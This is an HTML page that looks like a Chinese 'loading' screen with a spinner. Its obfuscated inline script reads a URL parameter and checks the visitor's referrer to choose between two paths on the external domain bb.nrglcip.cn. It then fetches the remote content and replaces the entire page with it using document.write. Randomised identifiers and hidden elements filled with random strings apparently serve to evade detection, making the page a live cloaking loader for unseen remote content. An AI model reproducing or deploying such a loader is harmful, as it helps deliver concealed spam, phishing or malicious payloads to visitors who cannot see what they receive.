<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .o4y0ujxG {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .o4y0ujxG .jp3UvNqD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .o4y0ujxG .content {
            line-height: 50px;
            text-align: center
        }

        .o4y0ujxG .img {
            width: 100%
        }

        .o4y0ujxG .aUNYb0 {
            text-align: center
        }

        .o4y0ujxG .aUNYb0 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .o4y0ujxG .aUNYb0 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .o4y0ujxG .aUNYb0 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .o4y0ujxG .aUNYb0 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .o4y0ujxG .aUNYb0 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .o4y0ujxG .aUNYb0 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .o4y0ujxG .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vLPo2Jq1K4a(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var isbRVbq = vLPo2Jq1K4a('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ isbRVbq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ isbRVbq +".html?a=share";
		}
		
        y4YNmFP0=url+"#"+new Date().getTime();
        y4YNmFP0 && function() {
            $.get(y4YNmFP0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >FuRg4VXW3bCaPXCruPlkKgp</li>
<b style='display:none' >I8tIkXUPnwaXZKUcoxfRUpTrhfsm9eln8K5mFsj5TEr8pzQxgvBKBS</b>
<li style='display:none' >FuRg4VXW3bCaPXCruPlkKgp</li><div class="o4y0ujxG">
    <div class="jp3UvNqD">
        <div class="aUNYb0">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>OeKWJjS64zxV3F8UjSACYRXjfma2tZTTeYhZ2l2tJssYTeVt28WIKwTlFC9ewtKS8ZGs4fFU</div>
<ul style='display:none' >XHeevOUO3gfCxYMX</ul>
<li style='display:none' >IpGsywesSmpzt9AQ2DiNhu1ewBN3pLqtJUFELdNHqVWzilrNL63JUFz7eR8js3ISq7vjZBNRXMDLwEnCa8oisDvjl2HVZWgzk</li>
<span style='display:none'>P1xz107qmthuXGYdImIskon0ycmtyhygFYeGY2W2Xe3XQbK60i7OWxRK7aRvOYjcfRWywLJ2sY184L72B9X1Xa</span></body>
</html>